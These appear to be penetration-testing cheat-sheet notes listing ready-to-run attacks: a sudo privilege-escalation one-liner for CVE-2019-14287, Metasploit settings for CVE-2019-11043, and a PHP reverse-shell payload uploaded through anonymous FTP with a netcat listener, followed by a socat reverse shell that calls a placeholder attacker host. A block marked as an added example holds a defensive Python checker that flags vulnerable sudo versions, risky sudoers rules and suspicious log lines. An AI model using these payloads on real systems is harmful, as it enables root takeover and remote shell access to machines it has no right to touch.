CVE-2019-14287 (Sudoers privilege escalation)
- On target, run the following command to get a root shell
sudo -lu#-1 /bin/bash
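A defender-side check for CVE-2019-14287, added here as an example and not part of the original notes: it flags sudo versions older than 1.8.28 (the release that fixed the bug), sudoers rules whose Runas list combines ALL with a negated root, and log lines where the target user is the raw ID -1 or 4294967295. The function names, the sample sudoers text and the sample log lines are constructed, and the log line format is an assumption.

```python
import re

FIXED = (1, 8, 28)  # first sudo release without CVE-2019-14287
RUNAS = re.compile(r"=\s*\(([^):]*)")  # user part of "(users:groups)"
# Target user as it appears in sudo's log line (format is an assumption)
LOG_UID = re.compile(r"\bUSER=#(-1|4294967295)\b")

# Constructed sample input, not taken from a real host
SAMPLE_SUDOERS = """\
# constructed example
root  ALL=(ALL:ALL) ALL
alice ALL=(ALL, !root) /usr/bin/vi
carol ALL=(www-data) /bin/systemctl
"""
SAMPLE_LOG = """\
Oct 15 10:02:11 host sudo: alice : TTY=pts/0 ; PWD=/home/alice ; USER=#-1 ; COMMAND=/bin/bash
Oct 15 10:03:40 host sudo: carol : TTY=pts/1 ; PWD=/srv ; USER=www-data ; COMMAND=/bin/systemctl
"""


def is_vulnerable_version(version):
    """True for versions such as '1.8.27' or '1.8.21p2' that predate the fix."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised sudo version: {version!r}")
    return tuple(int(p) for p in m.groups()) < FIXED


def risky_rules(sudoers_text):
    """Return rules whose Runas user list has ALL plus a negated root."""
    hits = []
    for line in (l.strip() for l in sudoers_text.splitlines()):
        m = RUNAS.search(line)
        if not line or re.match(r"#(?!\d)", line) or not m:
            continue  # blank, comment/#include, or no Runas spec
        users = [u.strip() for u in m.group(1).split(",")]
        if "ALL" in users and any(u in ("!root", "!#0") for u in users):
            hits.append(line)
    return hits


def suspicious_log_lines(log_text):
    """Return log lines where sudo ran a command as UID -1 / 4294967295."""
    return [l for l in log_text.splitlines() if LOG_UID.search(l)]


if __name__ == "__main__":
    print(risky_rules(SAMPLE_SUDOERS))
    print(suspicious_log_lines(SAMPLE_LOG))
```

A rule with a plain (ALL) Runas list is not reported because that user may already run the command as root.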
CVE-2019-11043 (Nginx + PHP-FPM buffer overflow)
- Use the Metasploit module exploit(multi/http/php_fpm_rce) with the following options
RHOST=TARGET_IP
RPORT=TARGET_PORT
TARGETURI=/target_vulnerable_file.php
CVE-1999-0527 (FTP server with world writable directories)
- Log in to the target FTP server as user "anonymous" with no password
- On target FTP, upload reversephpshell.php with the following content
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1'");?>
- On attacker, start a listener
nc -v -n -l -p ATTACKER_PORT
- On target, request the uploaded file to trigger the reverse shell
http://TARGET_IP:TARGET_PORT/reversephpshell.php
Socat Reverse Shell
On attacker
socat file:`tty`,raw,echo=0 tcp-listen:ATTACKER_PORT
On target
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:ATTACKER_PORT;